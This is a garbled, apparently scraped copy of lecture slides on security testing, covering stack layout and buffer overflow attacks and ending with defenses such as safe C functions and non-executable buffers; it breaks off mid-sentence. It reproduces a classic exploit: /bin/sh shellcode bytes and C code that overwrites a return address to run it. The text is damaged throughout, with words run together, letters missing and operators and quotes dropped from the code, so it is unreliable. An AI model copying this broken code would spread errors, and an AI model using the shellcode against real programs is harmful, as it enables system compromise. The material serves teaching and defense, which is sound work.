【導(dǎo)讀】Topicsin. SecurityTesting. ComputerSecurity. assets(.,servers,applications,webpages,data). from:. –corruption. –unauthorizedaccess. –malicioussoftware. –hardwaremechanisms(.,biometrics). programs(.,role-basedaccesscontrol). 2. trustworthy. thesecuritypolicy. 3. constraints. (.,encryption,firewalls)needtobe. 4. andprises:. –subsystems. .,webservers,applicationservers,DBMS,directories,webapplications,andlegacy. applications. encryptionmethods,audit,logging,monitoring,intrusiondetection,registration,backup,recovery5. ExampleofaSecurity. Architecture. 6. ValidatingSecurity. Architecture. automated)inspectionprocess,similartocode. 7. Threatmodeling. thecourse.Identifytheassets. putingresources,tradesecrets,financialdata. –.,identifydataflows,encryptionpr

　　

【正文】 with larger memory Heap ? Dynamic memory allocation ? malloc() in C and new in C++ ? More flexibility ? More stable data storage – memory allocated in the heap remains in existence for the duration of a program ? Data with unknown lifetime – global (storage class external) and static variables Stack – I ? Provides highlevel abstraction – Allocates local variables when a function gets called (with known lifetime) – Passes parameters to functions – Returns values from functions ? Push/Pop operations (LIFO) – implemented by CPU ? Size – dynamically adjusted by kernel at runtime Stack – II ? Stack Pointer (SP) – TOP of stack (or next free available address) ? Fixed address – BOTTOM of stack ? Logical Stack Frame (SF) – contains parameters to functions, local variables, data to recover previous SF (: instruction pointer at time of function call) ? Frame Pointer (FP)/local Base Pointer (BP) – Beginning of Activation Record (AR), used for referencing local variables and parameters (accessed as offsets from BP) Activation record ? Contains all info local to a single invocation of a procedure – Return address – Arguments – Return value – Local variables – Temp data – Other control info Accessing an activation record ? Base pointer: beginning of AR – Arguments are accessed as offsets from bp ? Environment pointer: pointer to the most recent AR (usually a fixed offset from bp) ? Stack pointer: top of AR stack – Temporaries are allocated on top on stack When a procedure is called ? Previous FP is saved ? SP is copied into FP ? new FP ? SP advances to reserve space for local variables ? Upon procedure exit, the stack is cleaned up Function pointer ? Find a buffer adjacent to function pointer in stack, heap or static data area ? Overflow buffer to change the function pointer so it jumps to desired location ? Example: attack against superprobe program Linux Longjpm buffer ? setjmp(buffer) to set a checkpoint ? longjmp(buffer) to go back to checkpoint ? Corrupt state of buffer so that longjmp(buffer) jumps to the attack code instead Example void function(int a, int b, int c) { char buffer1[5]。 char buffer2[10]。 } void main() { function(1,2,3)。 } pushl $3 pushl $2 pushl $1 call function pushl %ebp movl %esp,%ebp subl $20,%esp Buffer overflow example void function(int a, int b, int c) { char buffer1[5]。 char buffer2[10]。 int *ret。 ret = buffer1 + 12。 (*ret) += 8。 } void main() { int x。 x = 0。 function(1,2,3)。 x = 1。 printf(%d\n,x)。 } Result of program ? Output: 0 ? Return address has been modified and the flow of execution has been changed ? All we need to do is place the code that we are trying to execute in the buffer we are overflowing, and modify the return address so it points back to buffer Example [6] char shellcode[ ] = “\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b” “\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd” “x80\xe8\xdc\xff\xff\xff/bin/sh”。 char large_string[128]。 void main() { char buffer[96]。 int i。 long *long_ptr = (long *) large_string。 /* long_ptr takes the address of large_string */ /* large_string’s first 32 bytes are filled with the address of buffer */ for (i = 0。 i 32。 i++) *(long_ptr + i) = (int) buffer。 /* copy the contents of shellcode into large_string */ for (i = 0。 i strlen(shellcode)。 i++) large_string[ i ] = shellcode[ i ]。 /* buffer gets the shellcode and 32 pointers back to itself */ strcpy(buffer, large_string)。 } Example illustrated [6] argc user stack buffer large_string[128] RA Shellcode[] heap bss Process Address Space i long_ptr sfp Buffer overflows defenses ? Writing correct code (good programming practices) ? Debugging Tools ? Nonexecutable buffers ? Array bounds checking ? Code pointer integrity checking (., StackGuard) Problems with C ? Some C functions are problematic – Static size buffers – Do not have builtin bounds checking ? While loops – Read one character at a time from user input until end of line or end of file – No explicit checks for overflows Some problematic C functions Function Severity Solution: Use gets Most Risky fgets(buf, size, stdin) strcpy, strcat Very Risky strncpy, strncat sprintf, vsprintf Very Risky snprintf, vsnprintf or precision specifiers scanf family Very Risky precision specifiers or do own parsing realpath, syslog Very Risky (depending on implementation) Maxpathlen and manual checks getopt, getopt_long, getpass Very Risky (depending on implementation) Truncate string inputs to reasonable size Good programming practices – I (useful to know for code inspections) DO NOT USE: Instead USE: void main( ) { char buf [40]。 gets(buf)。 } void main( ) { char buf [40]。 fgets(buf,40,stdin)。 } void main() { char buf[4]。 char src[8] = rrrrr。 strcpy(buf,src)。 } if (src_size = buf_size) { cout error。 return(1)。 } else { strcpy(buf,src)。 } OR strncpy(buf,src,buf_size 1)。 buf[buf_size 1] = 39。\039。 Good programming practices – II DO NOT USE: Instead USE: Debugging tools ? More advanced debugging tools – Fault injection tools – inject deliberate buffer overflow faults at random to search for vulnerabilities – Static analysis tools – detect overflows ? Can only minimize the number of overflow vulnerabilities but cannot provide total assurance Nonexecutable buffers ? Make data segment of program’s address space nonexecutable ? attacker can’t execute code injected into input buffer (promise between security and patibility) Nonexecutable buffers ? If code already in program, attacks can b